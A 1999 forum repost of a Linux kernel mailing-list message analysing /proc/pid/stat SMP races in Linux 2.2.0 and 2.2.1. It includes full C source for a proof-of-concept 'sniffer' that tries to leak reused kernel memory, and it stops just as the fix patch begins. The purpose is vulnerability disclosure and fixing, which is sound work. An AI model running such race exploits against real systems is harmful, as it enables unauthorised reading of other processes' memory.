
proc race fixes for 2.2.1.txt

From: cloudsky (晓舟·轩辕明月), Board: Security

Subject: [patch] /proc race fixes for 2.2.1

Posted at: Wuhan Baiyun Huanghe BBS (Wed Feb  3 22:10:10 1999), local mail

  

This is a short analysis I did yesterday of the array.c (/proc/pid/...)
races in Linux 2.2.0 and Linux 2.2.1. These races led to very easily
reproducible crashes and oopses in 2.2.0, and Linux 2.2.1 is still not
completely fixed: there remains a potential race that is very hard to
reproduce (I think you need at least a 3-way SMP box). You can find a
kind of /proc sniffer in this email, and at the end you'll find my
complete fix for 2.2.1.

  

If exploited, the race can at least allow reading data from randomly
reused memory. The memory that could be sniffed could contain any kind of
useful data (userspace process memory, cache, or whatever). It's not
possible to grab the whole page, but it is possible to reconstruct the
contents of the memory by reading and decoding the output of /proc.

  

It may be impossible to exploit the SMP race I am pointing out, even on
3-way SMP, because of timing issues, but there is no lock that assures
atomicity.

  

Side note: I hope I have diffed all the interesting changes from my tree
against 2.2.1 at the end of this email (I don't have the time to check).
If for some reason the patch doesn't apply cleanly or doesn't work, don't
flood me with mail; instead, sync with my personal kernel tree, where this
race is fixed (I keep it open just so other people can try it), at
ftp://e-mind.com/pub/linux/arca-tree/2.2.1_arca-2.gz. My tree also has
many other improvements, bugfixes, and features (not all developed by me,
e.g. the ieee1284-parport code by Tim Waugh), and it may have any kind of
bug in it, so ask me before using it in production (I'll tell you what to
remove to make it rock solid for sure).

  

Andrea Arcangeli 

  

---------- Forwarded message ----------
Date: Tue, 2 Feb 1999 01:07:07 +0100 (CET)
From: Andrea Arcangeli <andrea@e-mind.com>
To: linux-kernel@vger.rutgers.edu
Subject: [patch] /proc race fixes for 2.2.1

  

2.2.1 reintroduced an SMP race in array.c. The SMP race is that wait(2)
can free the kernel stack of the zombie process while array.c is using it.

  

Once the page is freed it can be reused, and if it gets recycled before
array.c has finished using it, you can reconstruct parts of RAM that you
should not be allowed to read (by looking at /proc data), and array.c
itself could run into trouble during its lifetime (I haven't checked this
last point; it's a guess).

  

In practice the window for the race is small, and I think you would need
at least 3 CPUs to reproduce it.

  

The first CPU has to fork a process that does only an _exit(2), then wait
until the forked process becomes a zombie. Once it is a zombie, it has to
start a /proc sniffer on another CPU that reads /proc/zombiepid/stat.

  

The sniffer saves the file's contents to a buffer on the first pass, then
reads /proc/../stat in a loop, comparing each read against the sample
saved in the buffer, and logs the output of /proc/../stat whenever it
differs from the saved sample.

  

Once the sniffer is at full speed (the loop that watches /proc for changes
has started), the task on the first CPU (the one that forked the sniffer)
has to do a wait(2) so that the stack of the zombie process is released.

  

Just before doing the wait(2) you must eat all the available memory with a
thrashing program, and this has to run on yet another CPU (so you need at
least a 3-way SMP box). Since this memory-thrasher will start allocating
tons of memory, there is a chance that the pages freed by wait(2) will be
reallocated by the kernel before the /proc sniffer's read finishes.

  

It's theoretically possible to sniff data from the kernel by exploiting
the /proc race, but it's really hard and only feasible on some very
parallel hardware.

  

I also wrote a sample exploit (really ugly; I wrote it very fast and
without thinking too much about it, because I think my time is better
spent fixing the bug or writing useful code than writing exploits... and
because I realized that on the hardware I have here it would never have
worked ;).

  

/*
 * Copyright (C) 1999  Andrea Arcangeli
 * Linux-2.2.1 /proc SMP race sniffer
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <pthread.h>
#include <sys/wait.h>

static volatile int pid = -1;
static pthread_mutex_t pid_lock = PTHREAD_MUTEX_INITIALIZER;
static pthread_mutex_t zombie_lock = PTHREAD_MUTEX_INITIALIZER;

static int get_current_pid(void)
{
        int __pid;
        pthread_mutex_lock(&pid_lock);
        __pid = pid;
        pthread_mutex_unlock(&pid_lock);
        return __pid;
}

static void * sniffer(void *dummy)
{
        int cache_pid = -1, fd = -1, length_cmp = 0;
        char str[50], buf[2000], sample[2000];

        /* wait until main has published the first zombie pid */
        pthread_mutex_lock(&zombie_lock);
        pthread_mutex_unlock(&zombie_lock);

        for (;;)
        {
                if (get_current_pid() != cache_pid)
                {
                        pthread_mutex_lock(&zombie_lock);
                        cache_pid = pid;
                        snprintf(str, 50, "/proc/%d/stat", cache_pid);
                        if (fd > 0)
                                close(fd);
                        fd = open(str, O_RDONLY|O_NONBLOCK);
                        if (fd > 0)
                        {
                                /* first pass: save a reference sample */
                                int length = read(fd, buf, sizeof(buf));
                                if (length > 0)
                                {
                                        length_cmp = length;
                                        memcpy(sample, buf, length);
                                        sample[length-1] = 0;
                                }
                        }
                        pthread_mutex_unlock(&zombie_lock);
                }

                if (fd > 0)
                {
                        int length;

                        lseek(fd, 0, SEEK_SET);
                        length = read(fd, buf, sizeof(buf));
                        if (length <= 0)
                                continue;
                        buf[length-1] = 0;
                        /* log whenever the output differs from the sample */
                        if (length >= length_cmp && memcmp(buf, sample,
                                                           length_cmp))
                                printf("length %d, pid %d\n"
                                       "original data: %s\n"
                                       "modified data: %s\n",
                                       length, cache_pid, sample, buf);
                }
        }
        return NULL;
}

static int is_zombie(int __pid)
{
        char str[50], state = 0;
        FILE * status;
        snprintf(str, 50, "/proc/%d/status", __pid);
        status = fopen(str, "r");
        if (!status)
        {
                perror("open");
                exit(2);
        }
        fscanf(status, "%*s\t%*s\nState:\t%c", &state);
        fclose(status);
        return state == 'Z';
}

int main(int argc, char *argv[])
{
        int dummy;
        pthread_t task_struct_sniffer;

        pthread_mutex_lock(&zombie_lock);

        if (pthread_create(&task_struct_sniffer, NULL, sniffer, NULL))
        {
                perror("pthread_create");
                exit(1);
        }

        for (;;)
        {
                int __pid = fork();
                if (!__pid)
                        _exit(0);

                /* spin until the child shows up as a zombie */
                while (!is_zombie(__pid));

                pthread_mutex_lock(&pid_lock);
                pid = __pid;
                pthread_mutex_unlock(&pid_lock);

                /* let the sniffer take its sample, then reap the zombie
                 * so its kernel stack gets freed under the sniffer */
                pthread_mutex_unlock(&zombie_lock);
                usleep(1);
                wait(&dummy);
                pthread_mutex_lock(&zombie_lock);
        }
}

  

It probably has bugs too (since I have no way to make it work here, I am
not going to look at it further); I attached it only in case someone is
interested in a sample exploit. BTW, is there a better way to know when
the child has become a zombie than reading /proc/pidofchild/status? I
thought about catching the SIGCHLD signal, but first I was not sure that a
wait() would be woken up anyway (too lazy to check signal.c ;), and
second, with the /proc/xxx/status approach I had to write less code, and
since this is not performance-critical code I had no doubt which way to
take ;).

  

I also understood very well the reason for the 2.2.0 oopses and processes
stuck in D state. Something like this was happening:

  

        `ps`                            tsk
        -------------                   -----------------
        sys_read()
        lock_kernel()
                                        do_page_fault()
        array_read()
                                        down(tsk->mm)
                                        find_vma()
        get_process_array()
                                        handle_mm_fault()
                                        lock_kernel() /* woowoo, so spin
                                                         on the big kernel
                                                         lock */
        get_stat()
        grab_task()
        down(tsk->mm) /* just owned by tsk */
        schedule() /* so release the big kernel lock */
                                        tsk gets the big kernel lock
                                        here
                                        finishes the page fault
                                        __up()
                                        wake_up_process(`ps`)
                                        many other things
                                        execve() /* this is the harmful one */
                                        mmput(tsk->mm);
                                        tsk->mm = mm_alloc(); (mm->count = 1)
                                        finish execve...
                                        .... everything it wants ....
        now `ps` gets rescheduled
        and owns the mm->semaphore
        (of a mm_struct that is not
        tsk->mm anymore)
        release_task(tsk);
        mmput(tsk->mm); (but mm->count was 1!!)
        exit_mmap();
        zap_page_range() /* aieee! */
                                        at the first fault it will get
                                        a mm = &init_mm !!

  

Things like this couldn't happen in 2.2.0-pre9, simply because there
tsk->mm still referenced the old mm of the process (the one before the
execve): tsk->mm was a copy, not a live runtime value.

  

Obviously the copy approach (1) had the stack-overflow and performance
problems.

  

So now I have fixed all the races with a zerocopy approach (originally
suggested by Linus) that increments the page count of the process stack
instead of doing the copy, and that also assures array.c always uses the
mm it got earlier (with mmget()).

  

Works fine here. Patch against 2.2.1: 

  

--- /tmp/array.c        Tue Feb  2 00:08:07 1999
+++ linux/fs/proc/array.c       Mon Feb  1 23:51:51 1999
